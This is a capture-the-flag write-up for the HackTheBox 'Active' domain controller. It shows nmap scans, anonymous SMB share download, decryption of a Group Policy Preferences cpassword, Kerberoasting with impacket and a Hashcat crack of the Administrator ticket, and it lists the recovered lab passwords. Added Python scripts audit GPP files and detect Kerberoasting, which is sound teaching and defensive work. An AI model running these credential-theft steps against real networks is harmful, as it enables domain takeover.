Active (Easy)

Host entries

10.10.10.100  active.htb

If the target is Active Directory, synchronize the local clock with the domain controller via NTP first: Kerberos rejects requests whose clock skew is too large.

Content

  • SMB Enumeration
  • SMB full share download to the local machine ([[SMB Download]], smbclient mget *)
  • GPP Decryption
  • Kerberoasting
  • Hashcat TGS crack

Reconnaissance

Initial reconnaissance for TCP ports

nmap -p- --open --min-rate 5000 -Pn -n -vvv -oG allPorts 10.10.10.100
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.100 ()   Status: Up
Host: 10.10.10.100 ()   Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 9389/open/tcp//adws///, 47001/open/tcp//winrm///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49157/open/tcp//unknown///, 49158/open/tcp//unknown///, 49165/open/tcp//unknown///, 49166/open/tcp//unknown///, 49168/open/tcp//unknown///
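The grepable allPorts file above is what feeds the targeted -sCV scan that follows. As an added example (not code from the original writeup), the parser below rebuilds the comma-separated -p list from -oG output and flags the port combination (Kerberos, LDAP, global catalog, kpasswd) that tells you the host is a domain controller before any service probe runs. The sample input is constructed from the lines shown above; the field layout port/state/protocol/owner/service/rpcinfo/version/ is nmap's documented -oG format.

```python
"""Added example (not part of the original writeup): parse nmap grepable
(-oG) output, rebuild the port list for the follow-up -sCV scan, and flag
the port combination that identifies an Active Directory domain controller."""
import re
from typing import Dict, List

# Constructed sample modelled on the allPorts output shown in the writeup.
SAMPLE_OG = """# Nmap 7.93 scan initiated
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.100 ()   Status: Up
Host: 10.10.10.100 ()   Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 49152/open/tcp//unknown///
# Nmap done at ...
"""

# -oG port field layout: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([a-z|]+)/(\w+)/[^/]*/([^/]*)/[^/]*/[^/]*/")

# Ports whose presence together points at a domain controller.
DC_MARKERS = {88: "kerberos", 389: "ldap", 464: "kpasswd", 636: "ldaps",
              3268: "global-catalog", 3269: "global-catalog-ssl"}


def parse_grepable(text: str) -> Dict[str, List[dict]]:
    """Return {host: [{port, state, proto, service}, ...]} from -oG text."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        # Only the "Host: ... Ports: ..." lines carry port data.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service = m.groups()
            hosts.setdefault(host, []).append(
                {"port": int(port), "state": state, "proto": proto, "service": service})
    return hosts


def open_tcp_ports(hosts: Dict[str, List[dict]], host: str) -> List[int]:
    """Sorted open TCP ports for one host."""
    return sorted(e["port"] for e in hosts.get(host, [])
                  if e["state"] == "open" and e["proto"] == "tcp")


def port_spec(ports: List[int]) -> str:
    """Comma-separated value for nmap -p, as used in the targeted scan."""
    return ",".join(str(p) for p in ports)


def dc_indicators(ports: List[int]) -> Dict[int, str]:
    """Subset of DC_MARKERS present in the open port list."""
    return {p: DC_MARKERS[p] for p in ports if p in DC_MARKERS}


if __name__ == "__main__":
    hosts = parse_grepable(SAMPLE_OG)
    ports = open_tcp_ports(hosts, "10.10.10.100")
    print("nmap -p" + port_spec(ports) + " -sCV -Pn -n -oN targeted 10.10.10.100")
    print("DC indicators:", dc_indicators(ports))
```

Running it on the real allPorts file (read the file instead of SAMPLE_OG) gives exactly the -p list used in the targeted scan below; the DC indicators are what justify the NTP sync note at the top of the page before touching Kerberos.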

Services and Versions running:

nmap -p53,88,135,139,389,445,464,593,636,3268,3269,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 -sCV -Pn -n -vvv -oN targeted 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.089s latency).
Scanned at 2023-02-09 00:37:51 EST for 73s

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-02-09 05:37:58Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
|_clock-skew: 0s
| smb2-time: 
|   date: 2023-02-09T05:38:55
|_  start_date: 2023-02-09T05:22:50
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38577/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51069/udp): CLEAN (Timeout)
|   Check 4 (port 38631/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Enumerating port 445 with a null session (empty username and password), we identify that we have READ access to the Replication share:

crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\: 
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share        Permissions  Remark
SMB 10.10.10.100 445 DC -----        -----------  ------
SMB 10.10.10.100 445 DC ADMIN$                    Remote Admin
SMB 10.10.10.100 445 DC C$                        Default share
SMB 10.10.10.100 445 DC IPC$                      Remote IPC
SMB 10.10.10.100 445 DC NETLOGON                  Logon server share
SMB 10.10.10.100 445 DC Replication  READ
SMB 10.10.10.100 445 DC SYSVOL                    Logon server share
SMB 10.10.10.100 445 DC Users

We then enumerate the share; it contains a lot of files, so we prefer to download the whole share locally [1]:

# First connect to the share with a null session (-N: no password)
smbclient //10.10.10.100/Replication -N
# Then enable recursion and disable the per-file confirmation prompt
smb: \> RECURSE ON
smb: \> PROMPT OFF
# Finally download every file into the current local directory
smb: \> mget *

We then check what information is within the share: [image: directory tree of the downloaded Replication share]

Exploitation

This structure is very similar to the SYSVOL share, so we look for a Groups.xml under the Policies tree: this Group Policy Preferences file can contain a cpassword value, which is encrypted with a key Microsoft published and can therefore be decrypted [2]:

cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

And we can decrypt the cpassword with the gpp-decrypt utility:

# Decrypting cpassword
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18
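The Groups.xml above is one of several Group Policy Preferences files (Groups, Services, ScheduledTasks, DataSources, Printers, Drives) that can carry a cpassword attribute, and the fix on the defending side is to find and delete every such entry rather than to decrypt it. The audit script below is an added example, not code from the writeup: it walks a mapping of paths to XML text (as pulled from SYSVOL or, here, the Replication share), reports each element that carries a cpassword together with the account it targets, and never decrypts anything. The Groups.xml sample is the one shown above; the Drives.xml sample and its clsid value are constructed.

```python
"""Added example (not part of the original writeup): audit Group Policy
Preferences XML files pulled from SYSVOL/Replication for cpassword
attributes, reporting where a stored credential exists so it can be removed.
Nothing is decrypted."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# GPP file names that may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Sample 1: the Groups.xml found on the Replication share (from the writeup).
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>
"""

# Sample 2: a constructed Drives.xml with no stored credential (clsid is a placeholder).
DRIVES_XML = """<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{00000000-0000-0000-0000-000000000000}"><Drive name="H:" status="H:"><Properties action="U" path="\\\\DC\\Users" label="Home"/></Drive></Drives>
"""


def find_cpasswords(xml_text: str, source: str) -> List[Dict[str, object]]:
    """Return one finding per element carrying a cpassword attribute."""
    # Parse as bytes so the XML encoding declaration is honoured.
    root = ET.fromstring(xml_text.encode("utf-8"))
    # ElementTree has no parent pointers; build a child -> parent map once.
    parent = {child: p for p in root.iter() for child in p}
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        owner = parent.get(elem, elem)  # e.g. the <User> wrapping <Properties>
        findings.append({
            "source": source,
            "item": owner.tag,
            # userName exists in Groups.xml; other GPP types only have the item name.
            "account": elem.get("userName") or owner.get("name", ""),
            "changed": owner.get("changed", ""),
            "cpassword_set": bool(cpw),
        })
    return findings


def audit_gpp_tree(files: Dict[str, str]) -> List[Dict[str, object]]:
    """Scan a {relative_path: xml_text} mapping, looking only at known GPP file names."""
    findings = []
    for path, text in sorted(files.items()):
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        if name in GPP_FILES:
            findings.extend(find_cpasswords(text, path))
    return findings


# Constructed tree mirroring the Policies layout seen on the share.
SAMPLE_TREE = {
    "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": GROUPS_XML,
    "active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/USER/Preferences/Drives/Drives.xml": DRIVES_XML,
}

if __name__ == "__main__":
    for f in audit_gpp_tree(SAMPLE_TREE):
        print(f"[!] {f['source']}: <{f['item']}> {f['account']} (changed {f['changed']})")
```

Pointed at a real SYSVOL copy (build the mapping with os.walk), every hit is a credential that any domain user can read; the remediation is to remove the preference item and rotate the account's password, since the changed timestamp shows how long it has been exposed.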

Privilege Escalation

Now, since TCP port 5985 (WinRM) is not open we cannot log in directly, so we continue enumerating port 445. The next interesting share is not SYSVOL but Users; this is its structure: [image: directory tree of the Users share]. After a deep enumeration we could not identify any useful file that would provide a privilege escalation or lateral movement, so we tried another approach: [[Kerberoasting (Service Account Attacks)]]. ^659f81

impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-02-09 00:24:03.458965             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$
...
d03f8fe0c361c57c9c755c7d8a1024dd38c4beaf73a3688eb2c103450979c4e729c0b6d21a44160b71cc6             

The Administrator account has an SPN registered (active/CIFS:445), so as an authenticated domain user we can request a TGS for it directly from the DC; we successfully obtain it, and the next step is to crack it offline with Hashcat:

D:\Programas\hashcat-6.2.5>hashcat.exe -m 13100 -a 0 hash.txt rockyou.txt
hashcat (v6.2.5) starting


$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$
...
f0cc1679087568696baa79fef670721b$0bd9f0addc75c15876fda2aae6fc4a9611250979c4e729c0b6d21a44160b71cc6:Ticketmaster1968
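The hash prefix $krb5tgs$23$ (Hashcat mode 13100) means the DC issued the service ticket with RC4-HMAC, encryption type 0x17, which is what makes the offline crack feasible; a DC records every such request as Security event 4769. The script below is an added example, not code from the writeup: it applies the two standard Kerberoasting detections to constructed 4769 records (simplified to key=value pairs; the field names follow the real event), flagging successful RC4 service-ticket requests for non-machine, non-krbtgt SPNs, and separately flagging accounts that request tickets for many distinct SPNs, which also catches AES-only roasting that the RC4 rule misses.

```python
"""Added example (not part of the original writeup): Kerberoasting detection
logic run over constructed Windows Security event 4769 records."""
from collections import defaultdict
from typing import Dict, List

# Constructed sample, simplified to key=value pairs; field names follow the
# 4769 event ("A Kerberos service ticket was requested").
SAMPLE_4769 = [
    "EventID=4769 AccountName=svc_tgs@ACTIVE.HTB ServiceName=Administrator ClientAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 FailureCode=0x0",
    "EventID=4769 AccountName=DC$@ACTIVE.HTB ServiceName=DC$ ClientAddress=::ffff:10.10.10.100 TicketEncryptionType=0x12 FailureCode=0x0",
    "EventID=4769 AccountName=jdoe@ACTIVE.HTB ServiceName=krbtgt ClientAddress=::ffff:10.10.10.50 TicketEncryptionType=0x12 FailureCode=0x0",
    "EventID=4769 AccountName=jdoe@ACTIVE.HTB ServiceName=sqlsvc ClientAddress=::ffff:10.10.10.50 TicketEncryptionType=0x12 FailureCode=0x0",
    "EventID=4769 AccountName=jdoe@ACTIVE.HTB ServiceName=websvc ClientAddress=::ffff:10.10.10.50 TicketEncryptionType=0x12 FailureCode=0x0",
    "EventID=4769 AccountName=jdoe@ACTIVE.HTB ServiceName=backupsvc ClientAddress=::ffff:10.10.10.50 TicketEncryptionType=0x12 FailureCode=0x0",
    # A failed request (non-zero FailureCode) yields no ticket and is not counted.
    "EventID=4769 AccountName=svc_tgs@ACTIVE.HTB ServiceName=Administrator ClientAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 FailureCode=0x1F",
]

RC4_HMAC = "0x17"  # etype 23, the "23" in $krb5tgs$23$


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def is_service_account_request(ev: Dict[str, str]) -> bool:
    """Successful TGS request for an SPN that is not a machine account or krbtgt."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("FailureCode") == "0x0"
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def rc4_tgs_alerts(lines: List[str]) -> List[Dict[str, str]]:
    """Rule 1: RC4-encrypted service tickets for user/service account SPNs."""
    return [ev for ev in map(parse_event, lines)
            if is_service_account_request(ev)
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC]


def bulk_spn_requesters(lines: List[str], threshold: int = 2) -> Dict[str, int]:
    """Rule 2: accounts that obtained tickets for >= threshold distinct SPNs,
    regardless of encryption type."""
    seen = defaultdict(set)
    for ev in map(parse_event, lines):
        if is_service_account_request(ev):
            seen[ev["AccountName"]].add(ev["ServiceName"])
    return {acct: len(s) for acct, s in seen.items() if len(s) >= threshold}


if __name__ == "__main__":
    for ev in rc4_tgs_alerts(SAMPLE_4769):
        print(f"[RC4 TGS] {ev['AccountName']} -> {ev['ServiceName']} from {ev['ClientAddress']}")
    for acct, n in bulk_spn_requesters(SAMPLE_4769).items():
        print(f"[bulk SPN] {acct} requested {n} distinct service tickets")
```

Rule 1 is noisy in environments that still use RC4 legitimately, so the usual hardening is to set service accounts to AES-only and use long random passwords or group managed service accounts; once RC4 is gone, rule 2 (volume of distinct SPNs per account in a short window) is the signal that remains.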

Credentials

svc_tgs:GPPstillStandingStrong2k18
Administrator:Ticketmaster1968

Notes

  • We can download an entire SMB share directly by using [[SMB Download]] with the smbclient mget * functionality.

References

  1. Download an entire SMB share locally. 

  2. SYSVOL (Groups.xml) gpp decrypt.